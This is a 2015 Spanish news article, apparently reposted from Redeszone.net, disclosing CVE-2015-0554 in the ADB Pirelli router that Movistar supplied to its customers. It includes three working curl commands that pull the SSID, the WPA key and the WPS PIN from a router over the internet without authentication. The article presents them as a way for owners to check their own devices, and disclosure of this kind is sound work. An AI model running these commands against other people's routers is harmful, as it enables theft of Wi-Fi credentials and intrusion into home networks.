10 de enero de 2015

MOVISTAR. Grave fallo de seguridad en los routers ADB Pirelli P.DGA4001N

El operador Movistar proporciona a sus clientes en España el router inalámbrico ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N, es uno de los que Movistar equipa a sus clientes que contratan ADSL, es un router con Wi-Fi N hasta 300Mbps y cuatro puertos Fast-Ethernet. Hoy se ha dado a conocer un grave fallo de seguridad que podría permitir que cualquiera entre al router de forma remota sin necesidad de autenticación.
Eduardo Novella ha descubierto esta grave vulnerabilidad en este modelo de router y seguidamente les  explicamos en detalle en qué consiste y cómo se puede explotar este fallo de vuestros propios equipos para comprobar si estáis afectados.
  • Router afectado: ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N
  • Firmware del router probado: PDG_TEF_SP_4.06L.6
  • CVE asociado a la vulnerabilidad: CVE-2015-0554
El router HomeStation de Movistar desarrollado por el fabricante Pirelli tiene un grave fallo de seguridad que permite leer código HTML desde Internet, es decir, con tan sólo conocer la IP pública de la víctima, y es que el router no incorpora ningún tipo de autenticación ni protección adicional para impedir la extracción de información delicada, como por ejemplo el SSID de la conexión, PIN WPS, clave WPA y otra mucha información.
Riesgos: Lectura de información delicada y reinicio remoto del router
Los usuarios que tengan este router están corriendo un gran riesgo, y es que cualquiera podría leer información delicada guardada en el router, basta con hacer un CURL a la dirección IP pública del objetivo y a continuación poner el fichero que queramos leer.
Lectura del SSID del router:
curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
Lectura de la clave WPA del router:
curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
Lectura del PIN WPS:
curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
Y no sólo podemos hacer esto, ya que también podríamos reiniciar el router de la víctima de forma remota, y por tanto, hacer una denegación de servicio contra nuestro objetivo.
Conclusiones
  • En este enlace podéis ver todos los ficheros .html que se pueden ver fácilmente en el ADB Pirelli P.DGA4001N de Movistar. Como habéis podido ver, esta vulnerabilidad se puede explotar de forma remota, un cibercriminal podría realizar un seguimiento de nuestra red e incluso incorporarla a una botnet sin nosotros saber nada. 
  • Es necesario que el fabricante del router ADB Pirelli P.DGA4001N y Movistar lancen cuanto antes una actualización para corregir este grave fallo de seguridad. Os recomendamos acceder a este enlace donde encontraréis todos los detalles, asimismo también podéis entrar en el foro de Movistar en ADSLZone.
Fuente: Redeszone.net